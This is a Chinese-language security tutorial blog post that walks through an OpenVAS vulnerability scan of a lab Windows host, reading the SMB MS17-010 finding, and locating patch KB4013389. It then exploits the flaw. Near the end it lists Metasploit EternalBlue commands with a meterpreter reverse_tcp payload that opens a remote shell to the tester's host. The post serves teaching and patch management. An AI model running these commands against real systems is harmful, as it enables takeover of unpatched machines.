#yyds干货盘点#web安全day46(使用Openvas+MSF理解漏扫方法利用及补丁修复)

人生难得几回搏,此时不搏待何时。这篇文章主要讲述#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法利用及补丁修复相关的知识,希望能为你提供帮助。
使用OpenVAS进行漏扫关于OpenVAS的下载和安装请移步??web安全day40:最新版OpenVAS的安装配置 ??

新建扫描目标
开始进行扫描的时候需要新建一个目标。点击Configuration---Targets,点击新建。

配置扫描策略
查看扫描模板,就是在扫描过程中使用的扫描策略和配置,这个扫描模板一般保持默认,也可以自己配置。
填写好相关信息,点击Create
创建好的目标如下:



创建扫描任务
创建好目标后,需要创建扫描任务。
点击scans--tasks,新建任务。
填写好相关信息,名称自定义。扫描目标要选择之前我们配置过的,会以下拉列表的形式展现。

创建好的扫描目标如下:

开始扫描
点击开始按钮开始扫描。

状态变成了requested--完成状态。
扫描完成
扫描结束后,显示已经完成。

点击任务状态,可以查看扫描结果。
扫描报告导出
可以将扫描结果以报告的形式保存下来,点击test1打开扫描详细信息,点击最上方的download下载报告,这里报告格式自选。

下载好的报告如下。




对于漏*洞,我们主要关注以下内容
漏*洞名称:微软Windows SMB服务器多个漏*洞 - 远程 (4013389)
漏*洞风险等级:高危(HIGH)--中危(MEDIUM)--低危(LOW)--信息泄露

优先级
描述
修复建议

该评级是针对未经身份验证的远程攻*击者可以轻松利用并导致系统受损(任意代码执行)而无需用户交互的漏*洞。此类漏*洞通常为蠕虫、勒索软件等利用的漏*洞。
该漏*洞需尽快修复。

该评级适用于潜在可能危及资源的机密性、完整性或可用性的缺陷。此类漏*洞通常为暂无法真实可利用,但官方或互联网上披露的评级较高漏*洞,建议持续关注。
该漏*洞可延后修复。

该评级适用于能被成功利用可能性极低或者成功利用后无实际风险的漏*洞。此类漏*洞通常是程序源代码中的BUG缺陷,以及对合规场景和业务性能有影响的漏*洞。
该漏*洞暂可不修复。
漏*洞描述:?Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block(SMB)Server是其中的一个为计算机提供身份验证用以访问服务器上打印机和文件系统的组件。 Microsoft Windows中的SMBv1服务器存在远程代码执行漏*洞。
漏*洞危害:远程攻*击者可借助特制的数据包利用该漏*洞执行任意代码。以下版本受到影响:Microsoft Windows Vista SP2,Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1,Windows Server 2012 Gold和R2,Windows RT 8.1,Windows 10 Gold,1511和1607,Windows Server 2016。
修复建议
修复通过??信息安全漏*洞门户  ??可以获得cve和cnnvd的对应关系。?

在??国家信息安全库??中可以进一步查看并且获得补丁信息。

点击补丁获取链接。

这里Microsoft知识库文章4013389所对应的补丁就是KB4013389.
实验一:以445端口为例理解MS17_010我们通过OpenVAS扫描得出我们的目标主机开启了445端口,445端口是用于微软的文件共享SMB服务。我们知道,永恒之蓝可以根据445端口得到系统最高权限。
我们进行测试。
使用MSF针对445进行测试
关于MSF+MS17_010的测试方法可移步??渗*透测试:metasploit+ms-17-010+Windows2008r2??
msfconsole


msf6 > search ms17-010


use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.189.153
set LHOST 192.168.189.141
exploit


getuid


shel




【#yyds干货盘点#web安全day46(使用Openvas+MSF理解漏扫方法利用及补丁修复)】



    推荐阅读